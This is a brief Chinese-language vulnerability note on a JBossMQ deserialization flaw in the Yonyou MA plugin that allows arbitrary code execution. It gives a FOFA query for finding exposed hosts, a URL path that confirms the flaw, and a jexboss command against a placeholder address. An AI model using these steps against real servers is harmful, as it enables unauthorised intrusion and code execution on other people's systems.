用友MA插件存在命令执行漏洞
一、漏洞简介
用友MA-插件存在命令执行漏洞,该漏洞源于用友MA-插件管理默认开启JBossMQ服务,该服务存在反序列化漏洞,攻击者可利用该漏洞执行任意代码。
二、影响版本
- 用友MA插件
三、资产测绘
- fofa
app="用友-MA插件"
- 特征
四、漏洞复现
在url后面添加如下地址:/jbossmq-httpil/HTTPServerILServlet
,出现如下页面即证明存在JbossMQ反序列化漏洞
使用工具利用
jexboss-master.zip
python3 jexboss.py -host http://xx.xx.xx.xx/